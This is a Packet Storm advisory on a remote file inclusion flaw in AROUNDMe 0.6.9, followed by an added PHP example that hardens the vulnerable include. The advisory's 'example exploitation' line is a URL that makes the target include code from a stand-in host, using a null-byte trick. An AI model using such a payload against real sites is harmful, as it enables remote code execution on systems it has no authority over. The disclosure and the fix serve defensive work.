AROUNDMe0.6.9.txt

2006-10-27T00:00:00
ID PACKETSTORM:51375
Type packetstorm
Reporter noislet
Modified 2006-10-27T00:00:00

Description

                                        
                                            `==============================================  
AROUNDMe 0.6.9 remote file inclusion  
vendor site: http://barnraiser.org/  
vulnerable versions: 0.6.9 (and possibly older)  
  
discovered by: noislet ( http://www.noislet.org/ )  
  
vendor informed: 21.10.2006  
published: 22.10.2006  
==============================================  
  
product info:  
AROUNDMe is the perfect solution for you to bring people together  
around shared goals, activities and interests to form a shared  
knowledge network.  
  
==============================================  
  
bug details:  
Input passed to the "$templatePath" variable is not verified before being  
used to include files.  
  
required:  
register_globals = On  
  
file:  
pol_view.tpl.php (and others)  
  
buggy code:  
if (isset($poll)) {  
...  
include $templatePath . "poll_detail.inc.tpl.php";  
  
==============================================  
  
example exploitation:  
http://random.site/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=http://example.com/evilcode.php%00  
  
  
--  
noislet  
\ page http://www.noislet.org/  
`
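
A hardened counterpart to the buggy include above, as an added PHP example rather than code from AROUNDMe or the advisory: the fragment name is checked against a fixed allowlist and resolved under a server-configured root, so a request-supplied `templatePath` never reaches `include`. `ALLOWED_FRAGMENTS`, `resolve_fragment()` and the demo directory are assumptions made for illustration.

```php
<?php
// Added illustration, not AROUNDMe source. ALLOWED_FRAGMENTS, resolve_fragment()
// and the demo directory are hypothetical; only the fragment file name and the
// templatePath value come from the advisory.

const ALLOWED_FRAGMENTS = ['poll_detail.inc.tpl.php'];

// Return the real path of an allowlisted fragment under $root, or null.
// $root must come from server-side configuration, never from request data.
function resolve_fragment(string $root, string $name): ?string
{
    if (!in_array($name, ALLOWED_FRAGMENTS, true)) {
        return null;                          // unknown name, URL, NUL byte
    }
    $rootReal = realpath($root);
    $fileReal = realpath($root . DIRECTORY_SEPARATOR . $name);
    if ($rootReal === false || $fileReal === false) {
        return null;                          // root or fragment does not exist
    }
    // A symlinked fragment must still resolve to a file under the root.
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($fileReal, $prefix, strlen($prefix)) === 0 ? $fileReal : null;
}

// Constructed demo: a throwaway template directory with one fragment.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'aroundme_demo_' . getmypid();
mkdir($root);
file_put_contents($root . '/poll_detail.inc.tpl.php', "<?php echo 'poll detail', PHP_EOL;");

// 1) The fixed fragment name resolves, so the include runs.
$file = resolve_fragment($root, 'poll_detail.inc.tpl.php');
if ($file !== null) {
    include $file;
}

// 2) The advisory's templatePath value, concatenated the way the buggy code
//    does it, is not an allowlisted name, so the result is null.
$fromRequest = "http://example.com/evilcode.php\0" . 'poll_detail.inc.tpl.php';
var_dump(resolve_fragment($root, $fromRequest));

// Clean up the demo directory.
unlink($root . '/poll_detail.inc.tpl.php');
rmdir($root);
```

Independently of the code change, `register_globals = Off` removes the precondition the advisory lists, and `allow_url_include = Off` (PHP 5.2 and later) stops `include` from fetching URLs.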